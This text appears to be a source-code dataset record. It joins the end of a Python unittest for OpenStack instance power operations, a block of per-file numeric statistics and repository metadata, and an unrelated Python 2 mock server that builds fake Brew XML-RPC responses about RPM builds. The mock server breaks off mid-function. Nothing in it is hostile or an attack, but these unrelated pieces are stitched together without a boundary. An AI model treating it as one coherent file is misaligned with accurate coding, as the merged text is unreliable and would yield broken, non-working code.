instance_id=deployed_app_resource.vmdetails.uid,
logger=mock_logger)
def test_power_on_instance_exception(self):
deployed_app_resource = Mock()
# deployed_app_resource.vmdetails = Mock()
deployed_app_resource.vmdetails.uid = '111'
resource_fullname = '1234'
mock_logger = Mock()
self.power_operation.instance_service.instance_power_on = Mock(side_effect=Exception('foo'))
with self.assertRaises(Exception) as context:
self.power_operation.power_on(openstack_session=self.openstack_session,
cloudshell_session=self.cloudshell_session,
deployed_app_resource=deployed_app_resource,
resource_fullname=resource_fullname,
logger=mock_logger)
self.assertTrue(context)
self.power_operation.instance_service.instance_power_on.assert_called_with(openstack_session=self.openstack_session,
instance_id=deployed_app_resource.vmdetails.uid,
logger=mock_logger)
self.assertTrue(mock_logger.error.called)
def test_power_off_instance_not_powered(self):
deployed_app_resource = Mock()
deployed_app_resource.vmdetails.uid = '111'
resource_fullname = '1234'
mock_logger = Mock()
self.power_operation.power_off(openstack_session=self.openstack_session,
cloudshell_session=self.cloudshell_session,
deployed_app_resource=deployed_app_resource,
resource_fullname=resource_fullname,
logger=mock_logger)
self.power_operation.instance_service.instance_power_off.assert_called_with(openstack_session=self.openstack_session,
instance_id=deployed_app_resource.vmdetails.uid,
logger=mock_logger)
def test_power_off_instance_exception(self):
deployed_app_resource = Mock()
# deployed_app_resource.vmdetails = Mock()
deployed_app_resource.vmdetails.uid = '111'
resource_fullname = '1234'
mock_logger = Mock()
self.power_operation.instance_service.instance_power_off = Mock(side_effect=Exception('foo'))
with self.assertRaises(Exception) as context:
self.power_operation.power_off(openstack_session=self.openstack_session,
cloudshell_session=self.cloudshell_session,
deployed_app_resource=deployed_app_resource,
resource_fullname=resource_fullname,
logger=mock_logger)
self.assertTrue(context)
self.power_operation.instance_service.instance_power_off.assert_called_with(openstack_session=self.openstack_session,
instance_id=deployed_app_resource.vmdetails.uid,
logger=mock_logger)
self.assertTrue(mock_logger.error.called)
| 50.363636
| 131
| 0.573205
| 438
| 4,986
| 6.134703
| 0.111872
| 0.094157
| 0.162635
| 0.114626
| 0.874581
| 0.861928
| 0.848158
| 0.848158
| 0.846297
| 0.846297
| 0
| 0.008912
| 0.369836
| 4,986
| 98
| 132
| 50.877551
| 0.846276
| 0.024469
| 0
| 0.760563
| 0
| 0
| 0.006997
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.070423
| false
| 0
| 0.042254
| 0
| 0.126761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
23a263f506b2d32cb0014053b8d80084e391be52
| 71,389
|
py
|
Python
|
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | null | null | null |
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | null | null | null |
mock_server/custom/customresponse.py
|
xxxxzm/mock-server
|
2c8d26464c2734a5ab53a6423f41872312d3644f
|
[
"Apache-2.0"
] | 1
|
2019-05-30T06:37:17.000Z
|
2019-05-30T06:37:17.000Z
|
import xmlrpclib
import uuid
import pyclbr
import sys
#this class will be calling method on base of method name
class CustomResponse():
@staticmethod
def callMethod(requestData,methodName):
methodName = methodName.replace('.','_')
__import__('mock_server.custom.customresponse')
module = sys.modules['mock_server.custom.customresponse']
classes = pyclbr.readmodule('mock_server.custom.customresponse').items()
for claName,cla in classes:
if claName == 'CustomResponse':
continue
mockClass = getattr(module, claName)
if(CustomResponse.hasMethod(methodName, cla)):
response = getattr(mockClass, methodName)(requestData)
return response
return None
@staticmethod
def hasMethod(methodName,cla):
methods = cla.methods.items()
for methodNm, lineno in methods:
if methodNm == methodName:
return True
return False
class BrewHubMock():
global dynData # build related data, some of data are unique
global buildroot_id # build root unique id
global nvr_id # package nvr unique id
global paramSettings # setup parameters
# initial data
dynData = {'package_name':'libwacom','task_id':8708068,'creation_event_id':9360886,
"nvr":"libwacom-0.8-1.el6","version":"0.8","release":"1.el6","package_id":49335,
"id":779902,"name":"libwacom"}
buildroot_id = 7160000
nvr_id = 7962202
paramSettings = {}
@staticmethod
def callMethod(requestData,methodName):
return getattr(BrewHubMock, methodName)(requestData)
@staticmethod
def getBuild(request):
requestRPC = xmlrpclib.loads(request)
dynData['nvr'] = requestRPC[0][0]
buildParts = str(dynData['nvr']).split('-')
dynData['name'] = buildParts[0]
dynData['package_name'] = buildParts[0]
dynData['version'] = buildParts[1]
dynData['release'] = buildParts[2]
dynData['task_id'] = dynData['task_id'] +1
dynData['creation_event_id'] = dynData['creation_event_id'] +1
dynData['package_id'] = dynData['package_id'] + 1
dynData['id'] = dynData['id'] + 1
response="<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>owner_name</name><value><string>ajackson</string></value></member><member><name>package_name</name><value><string>${package_name}</string></value></member><member><name>task_id</name><value><int>${task_id}</int></value></member><member><name>volume_name</name><value><string>DEFAULT</string></value></member><member><name>owner_id</name><value><int>169</int></value></member><member><name>creation_event_id</name><value><int>${creation_event_id}</int></value></member><member><name>creation_time</name><value><string>2014-04-24 10:06:10.693793</string></value></member><member><name>state</name><value><int>1</int></value></member><member><name>nvr</name><value><string>${nvr}</string></value></member><member><name>completion_time</name><value><string>2014-04-24 10:09:17.513764</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>${version}</string></value></member><member><name>creation_ts</name><value><double>1398348370.69379</double></value></member><member><name>volume_id</name><value><int>0</int></value></member><member><name>release</name><value><string>${release}</string></value></member><member><name>package_id</name><value><int>${package_id}</int></value></member><member><name>completion_ts</name><value><double>1398348557.5137601</double></value></member><member><name>id</name><value><int>${id}</int></value></member><member><name>name</name><value><string>${name}</string></value></member></struct></value></param></params></methodResponse>"
for key in dynData:
varData = "${"+key+"}"
response = response.replace(varData, str(dynData[key]))
return response
@staticmethod
def getProductListings_fix(request):
response = ''
if(request.count('RHEL-6-Client')>0):
response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>Client</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>optional</name><value><struct><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
elif(request.count('RHEL-6-ComputeNode')>0):
response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
elif(request.count('RHEL-6-Workstation')>0):
response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>Workstation</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>optional</name><value><struct><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
elif(request.count('RHEL-6-Server')>0):
response = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member></struct></value></member><member><name>Server</name><value><struct><member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member></struct></value></member></struct></value></param></params></methodResponse>"
response = response.replace('${name}', dynData['name']);
response = response.replace('${version}', dynData['version']);
response = response.replace('${release}', dynData['release']);
return response
@staticmethod
def listBuildRPMs_fix(request):
archs= ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
buildRoot = [1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0]
dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
for i in range(20):
global buildroot_id
global nvr_id
payloadhash = str(uuid.uuid1()).replace('-','')
buildroot_id = buildroot_id + buildRoot[i]
nvr_id = nvr_id +1
dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
"</int></value></member><member><name>nvr</name><value><string>",pckgs[i],"-",dynData['version'],"-",
dynData['release'],"</string></value></member><member><name>buildroot_id</name><value><int>",str(buildroot_id),
"</int></value></member><member><name>buildtime</name><value><int>1398348462</int></value></member><member><name>payloadhash</name><value><string>",
payloadhash,"</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>",
dynData.get("version"),"</string></value></member><member><name>external_repo_id</name><value><int>0</int></value></member><member><name>release</name><value><string>",
dynData.get("release"),"</string></value></member><member><name>size</name><value><int>48700</int></value></member><member><name>arch</name><value><string>",
archs[i],"</string></value></member><member><name>id</name><value><int>",str(nvr_id),
"</int></value></member><member><name>external_repo_name</name><value><string>INTERNAL</string></value></member><member><name>name</name><value><string>",
pckgs[i],"</string></value></member></struct></value>"])
response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
response = response.replace('libwacom', dynData['name']);
return response
@staticmethod
def getProductListings(request):
prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg','hh','ii','jj','kk']
num = 1 # number times of baseline number of packages
numstr = dynData['name'][1:2]
if (numstr.isdigit()):
num = int (numstr)
response = ''
if(request.count('RHEL-6-Client')>0):
fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>Client</name><value><struct>"
body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
fix2 = "</struct></value></member><member><name>optional</name><value><struct>"
body2 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
fix3="</struct></value></member></struct></value></param></params></methodResponse>"
response = fix1
body = ""
for m in range(num):
part1 = body1.replace('${name}', prix[m] + dynData['name']);
part1 = part1.replace('${version}', dynData['version']);
part1 = part1.replace('${release}', dynData['release']);
part2 = body2.replace('${name}', prix[m] + dynData['name']);
part2 = part2.replace('${version}', dynData['version']);
part2 = part2.replace('${release}', dynData['release']);
response = response + part1
body = body + part2
response = response + fix2 + body + fix3
elif(request.count('RHEL-6-ComputeNode')>0):
fix1 = "<?xml version='1.0'?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct>"
response = fix1
for m in range(num):
body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value></data></array></value></member></struct></value></member>"
part1 = body1.replace('${name}', prix[m] + dynData['name']);
part1 = part1.replace('${version}', dynData['version']);
part1 = part1.replace('${release}', dynData['release']);
response = response + part1
fix2= "</struct></value></member></struct></value></param></params></methodResponse>"
response = response + fix2
elif(request.count('RHEL-6-Workstation')>0):
fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>Workstation</name><value><struct>"
body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
fix2 = "</struct></value></member><member><name>optional</name><value><struct>"
body2 = "<member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
fix3="</struct></value></member></struct></value></param></params></methodResponse>"
response = fix1
body = ""
for m in range(num):
part1 = body1.replace('${name}', prix[m] + dynData['name']);
part1 = part1.replace('${version}', dynData['version']);
part1 = part1.replace('${release}', dynData['release']);
part2 = body2.replace('${name}', prix[m] + dynData['name']);
part2 = part2.replace('${version}', dynData['version']);
part2 = part2.replace('${release}', dynData['release']);
response = response + part1
body = body + part2
response = response + fix2 + body + fix3
elif(request.count('RHEL-6-Server')>0):
fix1 = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>optional</name><value><struct>"
body1 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member><member><name>${name}-devel-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>s390</name><value><array><data><value><string>s390x</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member><member><name>s390x</name><value><array><data><value><string>s390x</string></value></data></array></value></member></struct></value></member>"
fix2 = "</struct></value></member><member><name>Server</name><value><struct>"
body2 = "<member><name>${name}-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>src</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member><member><name>${name}-data-${version}-${release}</name><value><struct><member><name>noarch</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value><value><string>ppc64</string></value></data></array></value></member></struct></value></member><member><name>${name}-debuginfo-${version}-${release}</name><value><struct><member><name>ppc</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>x86_64</name><value><array><data><value><string>x86_64</string></value></data></array></value></member><member><name>ppc64</name><value><array><data><value><string>ppc64</string></value></data></array></value></member><member><name>i686</name><value><array><data><value><string>x86_64</string></value><value><string>i386</string></value></data></array></value></member></struct></value></member>"
fix3="</struct></value></member></struct></value></param></params></methodResponse>"
response = fix1
body = ""
for m in range(num):
part1 = body1.replace('${name}', prix[m] + dynData['name']);
part1 = part1.replace('${version}', dynData['version']);
part1 = part1.replace('${release}', dynData['release']);
part2 = body2.replace('${name}', prix[m] + dynData['name']);
part2 = part2.replace('${version}', dynData['version']);
part2 = part2.replace('${release}', dynData['release']);
response = response + part1
body = body + part2
response = response + fix2 + body + fix3
return response
@staticmethod
def listBuildRPMs(request):
global paramSettings
print paramSettings
if (paramSettings.has_key('build_type') and paramSettings.get('build_type').count('rpm')==0):
return BrewHubMock.respondNone(request)
archs= ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
buildRoot = [1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0]
dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
num = 1
numstr = dynData['name'][1:2]
if (numstr.isdigit()):
num = int (numstr)
for k in range(num * 20):
global buildroot_id
global nvr_id
i = k % 20
p = k / 20
pckg = prix[p]+ pckgs[i]
payloadhash = str(uuid.uuid1()).replace('-','')
buildroot_id = buildroot_id + buildRoot[i]
nvr_id = nvr_id +1
dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
"</int></value></member><member><name>nvr</name><value><string>",pckg,"-",dynData['version'],"-",
dynData['release'],"</string></value></member><member><name>buildroot_id</name><value><int>",str(buildroot_id),
"</int></value></member><member><name>buildtime</name><value><int>1398348462</int></value></member><member><name>payloadhash</name><value><string>",
payloadhash,"</string></value></member><member><name>epoch</name><value><nil/></value></member><member><name>version</name><value><string>",
dynData.get("version"),"</string></value></member><member><name>external_repo_id</name><value><int>0</int></value></member><member><name>release</name><value><string>",
dynData.get("release"),"</string></value></member><member><name>size</name><value><int>48700</int></value></member><member><name>arch</name><value><string>",
archs[i],"</string></value></member><member><name>id</name><value><int>",str(nvr_id),
"</int></value></member><member><name>external_repo_name</name><value><string>INTERNAL</string></value></member><member><name>name</name><value><string>",
pckg,"</string></value></member></struct></value>"])
response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
response = response.replace('libwacom', dynData['name']);
return response
@staticmethod
def listTags(request):
#response = "<?xml version='1.0'?><methodResponse><params><param><value><array><data><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-pending</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5533</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-override</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5536</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-internal-compose-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6386</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-alpha-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6456</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-beta-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6572</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6658</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>1</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-2.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6671</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>1</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value></data></array></value></param></params></methodResponse>"
global paramSettings
if (paramSettings.has_key('build_type') and paramSettings.get('build_type').count('rpm')==0):
isMaven = "1"
else:
isMaven = "0"
